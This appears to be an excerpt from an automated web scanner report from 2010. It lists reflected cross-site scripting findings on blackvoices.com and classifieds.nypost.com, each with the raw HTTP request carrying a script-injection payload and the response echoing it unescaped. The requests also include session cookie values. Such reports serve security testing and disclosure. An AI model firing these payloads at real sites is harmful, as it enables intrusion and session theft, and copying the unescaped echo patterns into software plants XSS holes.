Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:c6b3b"-alert(1)-"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334838204.3408588364.1550714624; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 26 Nov 2010 20:24:41 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31028 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:c6b3b"-alert(1)-"dd17837dd5a"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:c6b3b\"-alert(1)-\"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f54</script><script>alert(1)</script>6443d67beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.489352780.3698329344; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 26 Nov 2010 20:24:44 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31020 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="$|http:"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video"; s_265.linkInternal ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5521b</script><script>alert(1)</script>b0ec37dd172 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*5521b</script><script>alert(1)</script>b0ec37dd172/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.489352780.3882878720; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 26 Nov 2010 20:24:48 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31020 Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ee9d</script><script>alert(1)</script>4509e38f224 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com2ee9d</script><script>alert(1)</script>4509e38f224/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240247308.3039161932.1081017600; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 26 Nov 2010 20:24:52 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31020 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1afe6</script><script>alert(1)</script>825b8783c8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240312844.371650124.1820198144; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Fri, 26 Nov 2010 20:24:55 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 31018 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm03 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... |http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video1afe6</script><script>alert(1)</script>825b8783c8e"; s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
1.151. http://www.classifieds.nypost.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ddde"><script>alert(1)</script>26b4242f446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4ddde"><script>alert(1)</script>26b4242f446=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 20:24:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38796
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c0d"-alert(1)-"e4e8feb3184 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing14c0d"-alert(1)-"e4e8feb3184/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86939"><script>alert(1)</script>68721ea7f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing86939"><script>alert(1)</script>68721ea7f0d/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:53 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.154. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/housing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 410a9"><script>alert(1)</script>94bde877b6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/?410a9"><script>alert(1)</script>94bde877b6a=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
1.155. http://www.classifieds.nypost.com/housing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.classifieds.nypost.com
Path:
/housing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b44"-alert(1)-"21f0db2ce7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/?d7b44"-alert(1)-"21f0db2ce7f=1 HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6dc5"-alert(1)-"47fd84fae45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housingb6dc5"-alert(1)-"47fd84fae45/rent/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:48 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb0"><script>alert(1)</script>3f30dc1b8ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housinge1cb0"><script>alert(1)</script>3f30dc1b8ef/rent/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f549c"-alert(1)-"e2c14dc3ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housing/rentf549c"-alert(1)-"e2c14dc3ef7/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:49 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4OTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a78"><script>alert(1)</script>e961e75065f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /housing/rent53a78"><script>alert(1)</script>e961e75065f/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
